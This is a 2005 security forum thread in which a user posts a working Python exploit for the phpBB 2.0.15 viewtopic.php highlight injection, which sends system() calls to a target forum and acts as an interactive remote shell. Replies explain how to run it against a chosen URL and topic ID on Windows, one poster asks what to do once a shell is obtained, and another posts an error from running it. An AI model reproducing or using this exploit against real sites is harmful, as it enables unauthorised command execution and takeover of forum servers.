|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 104
Members: 0
Total: 104
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpBB <= 2.0.15 viewtopic.php Remote PHP Code Execution |
|
Posted: Thu Jun 30, 2005 1:13 pm |
|
|
kwiateusz |
Beginner |
|
|
Joined: Jun 30, 2005 |
Posts: 2 |
Location: Poland |
|
|
|
|
|
|
Code: | # tested and working /str0ke
#!/usr/bin/pyth0n
#
############################################################### this exploit for
# phpBB 2.0.15
print "\nphpBB 2.0.15 arbitrary command execution eXploit" # emulates a shell,
print " 2005 by rattle@awarenetwork.org" # rather than
print " well, just because there is none." # sending a single
# command.
import sys ####
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus
INITTAG = '<g0>'
ENDTAG = '</g0>'
def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))
_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"
def usage():
print """Usage: %s <forum> <topic>
forum - fully qualified url to the forum
example: http://www.host.com/phpBB/
topic - ID of an existing topic. Well you
will have to check yourself.
"""[:-1] % sys.argv[0]; sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()
if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''
url = urlunparse(url)
if url[-1] != '/': url += '/'
topic = quote_plus((sys.argv[2]))
while 1:
try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]
if (cmd == "exit"): break
else: cmd = makecmd(cmd)
out = _ex % (url,topic,cmd)
try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass
else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;
print "EXPLOIT FAILED"
except:
continue |
how i can compile this exploit ?? |
|
|
|
|
|
|
|
|
Posted: Thu Jun 30, 2005 1:18 pm |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
go download python windows binaries first. www.python.org
after install go to command prompt and type
file name and vulnerable url with topic id
example
> shit.py http://www.host.com/phpBB/ 532
then u get nice shell emu prompt |
|
|
|
|
Posted: Thu Jun 30, 2005 2:11 pm |
|
|
kwiateusz |
Beginner |
|
|
Joined: Jun 30, 2005 |
Posts: 2 |
Location: Poland |
|
|
|
|
|
|
thx very much |
|
|
|
|
|
? k |
|
Posted: Thu Jun 30, 2005 3:35 pm |
|
|
badboy |
Regular user |
|
|
Joined: Jun 29, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
once i get a shell promt what can i do can u post some things you can do and how to do them if you can
thanks |
|
|
|
|
Posted: Thu Jun 30, 2005 5:29 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Why is everything Windows these Days? Surely people would notice there are better OS's out there.... |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Thu Jun 30, 2005 5:42 pm |
|
|
diaga |
Regular user |
|
|
Joined: Jun 27, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
File "C:\Documents and Settings\my\Desktop\shit.py", line 59
if url[-1] != '/': url += '/'
^
IndentationError: unindent does not match any outer indentation level |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|